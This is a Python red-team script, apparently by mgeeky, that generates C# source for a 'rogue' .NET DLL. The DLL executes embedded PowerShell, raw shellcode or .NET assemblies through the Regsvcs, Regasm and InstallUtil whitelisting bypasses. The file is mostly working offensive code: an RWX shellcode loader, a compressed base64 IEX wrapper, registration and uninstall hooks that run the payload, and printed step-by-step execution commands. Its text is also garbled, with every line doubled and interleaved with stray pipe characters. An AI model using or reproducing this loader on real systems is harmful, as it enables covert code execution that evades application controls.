# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script).
|
||||||
# Then proper compilation command will be:
|
# Then proper compilation command will be:
|
||||||
#
|
#
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
#
|
#
|
||||||
# Step 3: Code execution via Regsvcs, Regasm or InstallUtil:
|
# Step 3: Code execution via Regsvcs, Regasm or InstallUtil:
|
||||||
# x86:
|
# x86:
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
|
||||||
|
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
# x64:
|
# x64:
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
|
||||||
|
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import re
|
import re
|
||||||
import os
|
import os
|
||||||
import io
|
import io
|
||||||
import sys
|
import sys
|
||||||
import gzip
|
import gzip
|
||||||
import base64
|
import base64
|
||||||
import string
|
import string
|
||||||
import struct
|
import struct
|
||||||
import random
|
import random
|
||||||
import binascii
|
import binascii
|
||||||
import argparse
|
import argparse
|
||||||
|
|
||||||
|
|
||||||
def getCompressedPayload(filePath):
|
def getCompressedPayload(filePath):
|
||||||
out = io.BytesIO()
|
out = io.BytesIO()
|
||||||
encoded = ''
|
encoded = ''
|
||||||
with open(filePath, 'rb') as f:
|
with open(filePath, 'rb') as f:
|
||||||
inp = f.read()
|
inp = f.read()
|
||||||
|
|
||||||
with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
|
with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
|
||||||
fo.write(inp)
|
fo.write(inp)
|
||||||
|
|
||||||
encoded = base64.b64encode(out.getvalue())
|
encoded = base64.b64encode(out.getvalue())
|
||||||
|
|
||||||
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
|
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
|
||||||
encoded.decode()
|
encoded.decode()
|
||||||
)
|
)
|
||||||
return powershell
|
return powershell
|
||||||
|
|
||||||
def getSourceFileContents(payload, _format):
|
def getSourceFileContents(payload, _format):
|
||||||
launchCode = ''
|
launchCode = ''
|
||||||
usings = ''
|
usings = ''
|
||||||
|
|
||||||
if _format == 'exe':
|
if _format == 'exe':
|
||||||
|
|
||||||
exeLaunchCode = string.Template('''
|
exeLaunchCode = string.Template('''
|
||||||
public static void Execute() {
|
public static void Execute() {
|
||||||
|
|
||||||
string payload = "$payload2";
|
string payload = "$payload2";
|
||||||
byte[] decoded = System.Convert.FromBase64String(payload);
|
byte[] decoded = System.Convert.FromBase64String(payload);
|
||||||
|
|
||||||
Assembly asm = Assembly.Load(decoded);
|
Assembly asm = Assembly.Load(decoded);
|
||||||
MethodInfo method = asm.EntryPoint;
|
MethodInfo method = asm.EntryPoint;
|
||||||
object instance = asm.CreateInstance(method.Name);
|
object instance = asm.CreateInstance(method.Name);
|
||||||
method.Invoke(instance, null);
|
method.Invoke(instance, null);
|
||||||
|
|
||||||
}''').safe_substitute(
|
}''').safe_substitute(
|
||||||
payload2 = base64.b64encode(payload.encode()).decode()
|
payload2 = base64.b64encode(payload.encode()).decode()
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
launchCode = exeLaunchCode
|
launchCode = exeLaunchCode
|
||||||
|
|
||||||
elif _format == 'raw':
|
elif _format == 'raw':
|
||||||
|
|
||||||
foo = str(binascii.hexlify(payload), 'ascii')
|
foo = str(binascii.hexlify(payload), 'ascii')
|
||||||
fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)]
|
fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)]
|
||||||
encodedPayload = ' '
|
encodedPayload = ' '
|
||||||
|
|
||||||
for i in range(len(fooarr)):
|
for i in range(len(fooarr)):
|
||||||
if i % 16 == 0 and i > 0:
|
if i % 16 == 0 and i > 0:
|
||||||
encodedPayload += '\n '
|
encodedPayload += '\n '
|
||||||
encodedPayload += '{}, '.format(fooarr[i])
|
encodedPayload += '{}, '.format(fooarr[i])
|
||||||
|
|
||||||
encodedPayload = encodedPayload.strip()[:-1]
|
encodedPayload = encodedPayload.strip()[:-1]
|
||||||
|
|
||||||
shellcodeLoader = string.Template('''
|
shellcodeLoader = string.Template('''
|
||||||
[DllImport("kernel32")]
|
[DllImport("kernel32")]
|
||||||
private static extern IntPtr VirtualAlloc(
|
private static extern IntPtr VirtualAlloc(
|
||||||
IntPtr lpAddress, UIntPtr dwSize,
|
IntPtr lpAddress, UIntPtr dwSize,
|
||||||
UInt32 flAllocationType,
|
UInt32 flAllocationType,
|
||||||
UInt32 flProtect
|
UInt32 flProtect
|
||||||
);
|
);
|
||||||
|
|
||||||
[DllImport("kernel32")]
|
[DllImport("kernel32")]
|
||||||
private static extern bool VirtualFree(
|
private static extern bool VirtualFree(
|
||||||
IntPtr lpAddress,
|
IntPtr lpAddress,
|
||||||
UInt32 dwSize,
|
UInt32 dwSize,
|
||||||
UInt32 dwFreeType
|
UInt32 dwFreeType
|
||||||
);
|
);
|
||||||
|
|
||||||
[DllImport("kernel32")]
|
[DllImport("kernel32")]
|
||||||
private static extern IntPtr CreateThread(
|
private static extern IntPtr CreateThread(
|
||||||
UInt32 lpThreadAttributes,
|
UInt32 lpThreadAttributes,
|
||||||
UInt32 dwStackSize,
|
UInt32 dwStackSize,
|
||||||
IntPtr lpStartAddress,
|
IntPtr lpStartAddress,
|
||||||
IntPtr param,
|
IntPtr param,
|
||||||
UInt32 dwCreationFlags,
|
UInt32 dwCreationFlags,
|
||||||
ref UInt32 lpThreadId
|
ref UInt32 lpThreadId
|
||||||
);
|
);
|
||||||
|
|
||||||
[DllImport("kernel32")]
|
[DllImport("kernel32")]
|
||||||
private static extern bool CloseHandle(
|
private static extern bool CloseHandle(
|
||||||
IntPtr hHandle
|
IntPtr hHandle
|
||||||
);
|
);
|
||||||
|
|
||||||
[DllImport("kernel32")]
|
[DllImport("kernel32")]
|
||||||
private static extern UInt32 WaitForSingleObject(
|
private static extern UInt32 WaitForSingleObject(
|
||||||
IntPtr hHandle,
|
IntPtr hHandle,
|
||||||
UInt32 dwMilliseconds
|
UInt32 dwMilliseconds
|
||||||
);
|
);
|
||||||
|
|
||||||
private static UInt32 MEM_COMMIT = 0x1000;
|
private static UInt32 MEM_COMMIT = 0x1000;
|
||||||
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
|
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
|
||||||
private static UInt32 MEM_RELEASE = 0x8000;
|
private static UInt32 MEM_RELEASE = 0x8000;
|
||||||
|
|
||||||
public static void Execute() {
|
public static void Execute() {
|
||||||
|
|
||||||
byte[] payload = new byte[$payloadSize] {
|
byte[] payload = new byte[$payloadSize] {
|
||||||
$payload2
|
$payload2
|
||||||
};
|
};
|
||||||
|
|
||||||
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||||
Marshal.Copy(payload, 0, funcAddr, payload.Length);
|
Marshal.Copy(payload, 0, funcAddr, payload.Length);
|
||||||
IntPtr hThread = IntPtr.Zero;
|
IntPtr hThread = IntPtr.Zero;
|
||||||
UInt32 threadId = 0;
|
UInt32 threadId = 0;
|
||||||
|
|
||||||
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
|
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
|
||||||
WaitForSingleObject(hThread, 0xFFFFFFFF);
|
WaitForSingleObject(hThread, 0xFFFFFFFF);
|
||||||
|
|
||||||
CloseHandle(hThread);
|
CloseHandle(hThread);
|
||||||
VirtualFree(funcAddr, 0, MEM_RELEASE);
|
VirtualFree(funcAddr, 0, MEM_RELEASE);
|
||||||
|
|
||||||
}''').safe_substitute(
|
}''').safe_substitute(
|
||||||
payload2 = encodedPayload,
|
payload2 = encodedPayload,
|
||||||
payloadSize = len(payload)
|
payloadSize = len(payload)
|
||||||
)
|
)
|
||||||
|
|
||||||
launchCode = shellcodeLoader
|
launchCode = shellcodeLoader
|
||||||
|
|
||||||
else:
|
else:
|
||||||
usings += '''
|
usings += '''
|
||||||
using System.Management.Automation;
|
using System.Management.Automation;
|
||||||
using System.Management.Automation.Runspaces;
|
using System.Management.Automation.Runspaces;
|
||||||
'''
|
'''
|
||||||
powershellLaunchCode = string.Template('''
|
powershellLaunchCode = string.Template('''
|
||||||
public static void Execute() {
|
public static void Execute() {
|
||||||
|
|
||||||
byte[] payload = System.Convert.FromBase64String("$payload2");
|
byte[] payload = System.Convert.FromBase64String("$payload2");
|
||||||
string decoded = System.Text.Encoding.UTF8.GetString(payload);
|
string decoded = System.Text.Encoding.UTF8.GetString(payload);
|
||||||
|
|
||||||
Runspace runspace = RunspaceFactory.CreateRunspace();
|
Runspace runspace = RunspaceFactory.CreateRunspace();
|
||||||
runspace.Open();
|
runspace.Open();
|
||||||
|
|
||||||
Pipeline pipeline = runspace.CreatePipeline();
|
Pipeline pipeline = runspace.CreatePipeline();
|
||||||
pipeline.Commands.AddScript(decoded);
|
pipeline.Commands.AddScript(decoded);
|
||||||
pipeline.Invoke();
|
pipeline.Invoke();
|
||||||
|
|
||||||
runspace.Close();
|
runspace.Close();
|
||||||
}''').safe_substitute(
|
}''').safe_substitute(
|
||||||
payload2 = base64.b64encode(payload.encode()).decode()
|
payload2 = base64.b64encode(payload.encode()).decode()
|
||||||
)
|
)
|
||||||
|
|
||||||
launchCode = powershellLaunchCode
|
launchCode = powershellLaunchCode
|
||||||
|
|
||||||
|
|
||||||
template = string.Template('''
|
template = string.Template('''
|
||||||
using System;
|
using System;
|
||||||
using System.Diagnostics;
|
using System.Diagnostics;
|
||||||
using System.Reflection;
|
using System.Reflection;
|
||||||
using System.Runtime.InteropServices;
|
using System.Runtime.InteropServices;
|
||||||
using System.EnterpriseServices;
|
using System.EnterpriseServices;
|
||||||
$usings
|
$usings
|
||||||
|
|
||||||
/*
|
/*
|
||||||
Author: Casey Smith, Twitter: @subTee
|
Author: Casey Smith, Twitter: @subTee
|
||||||
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
|
|
||||||
Step 1: Create Your Strong Name Key -> key.snk
|
Step 1: Create Your Strong Name Key -> key.snk
|
||||||
|
|
||||||
$key = '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'
|
$key = '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'
|
||||||
$Content = [System.Convert]::FromBase64String($key)
|
$Content = [System.Convert]::FromBase64String($key)
|
||||||
Set-Content key.snk -Value $Content -Encoding Byte
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
Step 2: Compile source code:
|
Step 2: Compile source code:
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
|
|
||||||
Step 3: Execute your payload!
|
Step 3: Execute your payload!
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
# %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
# %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
*/
|
*/
|
||||||
|
|
||||||
namespace Program
|
namespace Program
|
||||||
{
|
{
|
||||||
public class Bypass : ServicedComponent
|
public class Bypass : ServicedComponent
|
||||||
{
|
{
|
||||||
public Bypass()
|
public Bypass()
|
||||||
{
|
{
|
||||||
}
|
}
|
||||||
|
|
||||||
// This executes if registration is successful
|
// This executes if registration is successful
|
||||||
[ComRegisterFunction]
|
[ComRegisterFunction]
|
||||||
public static void RegisterClass( string key )
|
public static void RegisterClass( string key )
|
||||||
{
|
{
|
||||||
Shellcode.Execute();
|
Shellcode.Execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
// This executes if registration fails
|
// This executes if registration fails
|
||||||
[ComUnregisterFunction]
|
[ComUnregisterFunction]
|
||||||
public static void UnRegisterClass( string key )
|
public static void UnRegisterClass( string key )
|
||||||
{
|
{
|
||||||
Shellcode.Execute();
|
Shellcode.Execute();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
[System.ComponentModel.RunInstaller(true)]
|
[System.ComponentModel.RunInstaller(true)]
|
||||||
public class ForInstallUtil : System.Configuration.Install.Installer
|
public class ForInstallUtil : System.Configuration.Install.Installer
|
||||||
{
|
{
|
||||||
// This executes during InstallUtil /U invocation
|
// This executes during InstallUtil /U invocation
|
||||||
public override void Uninstall(System.Collections.IDictionary savedState)
|
public override void Uninstall(System.Collections.IDictionary savedState)
|
||||||
{
|
{
|
||||||
Shellcode.Execute();
|
Shellcode.Execute();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
public class Shellcode
|
public class Shellcode
|
||||||
{
|
{
|
||||||
$launchCode
|
$launchCode
|
||||||
}
|
}
|
||||||
}''').safe_substitute(
|
}''').safe_substitute(
|
||||||
launchCode = launchCode,
|
launchCode = launchCode,
|
||||||
usings = usings
|
usings = usings
|
||||||
)
|
)
|
||||||
|
|
||||||
return template
|
return template
|
||||||
|
|
||||||
def detectFileIsExe(filePath, forced = False):
|
def detectFileIsExe(filePath, forced = False):
|
||||||
first1000 = []
|
first1000 = []
|
||||||
|
|
||||||
with open(filePath, 'rb') as f:
|
with open(filePath, 'rb') as f:
|
||||||
first1000 = f.read()[:1000]
|
first1000 = f.read()[:1000]
|
||||||
|
|
||||||
if not (first1000[0] == 'M' and first1000[1] == 'Z'):
|
if not (first1000[0] == 'M' and first1000[1] == 'Z'):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
|
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
|
||||||
|
|
||||||
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
|
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
dosStub = "This program cannot be run in DOS mode."
|
dosStub = "This program cannot be run in DOS mode."
|
||||||
printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
|
printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
|
||||||
|
|
||||||
#if not dosStub in printables:
|
#if not dosStub in printables:
|
||||||
# return False
|
# return False
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
||||||
def opts(argv):
|
def opts(argv):
|
||||||
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
|
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
|
||||||
parser.add_argument('inputFile', help = 'Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
|
parser.add_argument('inputFile', help = 'Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
|
||||||
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
|
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
|
||||||
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.')
|
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.')
|
||||||
|
|
||||||
args = parser.parse_args()
|
args = parser.parse_args()
|
||||||
|
|
||||||
if args.exe and args.raw:
|
if args.exe and args.raw:
|
||||||
sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n')
|
sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n')
|
||||||
sys.exit(-1)
|
sys.exit(-1)
|
||||||
|
|
||||||
return args
|
return args
|
||||||
|
|
||||||
def main(argv):
|
def main(argv):
|
||||||
sys.stderr.write('''
|
sys.stderr.write('''
|
||||||
:: Rogue .NET Source Code Generation Utility
|
:: Rogue .NET Source Code Generation Utility
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
''')
|
''')
|
||||||
if len(argv) < 2:
|
if len(argv) < 2:
|
||||||
print('Usage: ./generateRogueDotNet.py <inputFile>')
|
print('Usage: ./generateRogueDotNet.py <inputFile>')
|
||||||
sys.exit(-1)
|
sys.exit(-1)
|
||||||
|
|
||||||
args = opts(argv)
|
args = opts(argv)
|
||||||
|
|
||||||
_format = 'powershell'
|
_format = 'powershell'
|
||||||
|
|
||||||
if args.exe:
|
if args.exe:
|
||||||
if not detectFileIsExe(args.inputFile, args.exe):
|
if not detectFileIsExe(args.inputFile, args.exe):
|
||||||
sys.stderr.write('[-] File not recognized as PE/EXE.\n\n')
|
sys.stderr.write('[-] File not recognized as PE/EXE.\n\n')
|
||||||
return False
|
return False
|
||||||
|
|
||||||
_format = 'exe'
|
_format = 'exe'
|
||||||
sys.stderr.write('[+] File recognized as PE/EXE.\n\n')
|
sys.stderr.write('[+] File recognized as PE/EXE.\n\n')
|
||||||
with open(args.inputFile, 'rb') as f:
|
with open(args.inputFile, 'rb') as f:
|
||||||
payload = f.read()
|
payload = f.read()
|
||||||
|
|
||||||
elif args.raw:
|
elif args.raw:
|
||||||
_format = 'raw'
|
_format = 'raw'
|
||||||
sys.stderr.write('[+] File specified as raw Shellcode.\n\n')
|
sys.stderr.write('[+] File specified as raw Shellcode.\n\n')
|
||||||
with open(args.inputFile, 'rb') as f:
|
with open(args.inputFile, 'rb') as f:
|
||||||
payload = f.read()
|
payload = f.read()
|
||||||
|
|
||||||
else:
|
else:
|
||||||
sys.stderr.write('[+] Powershell code given.\n')
|
sys.stderr.write('[+] Powershell code given.\n')
|
||||||
|
|
||||||
if args.inputFile.endswith('.exe'):
|
if args.inputFile.endswith('.exe'):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
payload = getCompressedPayload(args.inputFile)
|
payload = getCompressedPayload(args.inputFile)
|
||||||
|
|
||||||
output = getSourceFileContents(payload, _format)
|
output = getSourceFileContents(payload, _format)
|
||||||
|
|
||||||
print(output)
|
print(output)
|
||||||
|
|
||||||
management = ''
|
management = ''
|
||||||
if _format == 'powershell':
|
if _format == 'powershell':
|
||||||
management = ' /r:System.Management.Automation.dll'
|
management = ' /r:System.Management.Automation.dll'
|
||||||
|
|
||||||
commands = '''
|
commands = '''
|
||||||
|
|
||||||
=====================================
|
=====================================
|
||||||
NEXT STEPS:
|
NEXT STEPS:
|
||||||
|
|
||||||
Step 1: Create Your Strong Name Key -> key.snk (or use the one provided in this directory)
|
Step 1: Create Your Strong Name Key -> key.snk (or use the one provided in this directory)
|
||||||
|
|
||||||
$key = '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'
|
$key = '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'
|
||||||
$Content = [System.Convert]::FromBase64String($key)
|
$Content = [System.Convert]::FromBase64String($key)
|
||||||
Set-Content key.snk -Value $Content -Encoding Byte
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
Step 2: Compile source code:
|
Step 2: Compile source code:
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
|
|
||||||
Step 3: Execute your payload!
|
Step 3: Execute your payload!
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
%WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
'''.format(management)
|
'''.format(management)
|
||||||
|
|
||||||
if 'PROGRAMFILES(X86)' in os.environ:
|
if 'PROGRAMFILES(X86)' in os.environ:
|
||||||
commands = commands.replace('Framework', 'Framework64')
|
commands = commands.replace('Framework', 'Framework64')
|
||||||
|
|
||||||
sys.stderr.write(commands)
|
sys.stderr.write(commands)
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
main(sys.argv)
|
main(sys.argv)
|
||||||
|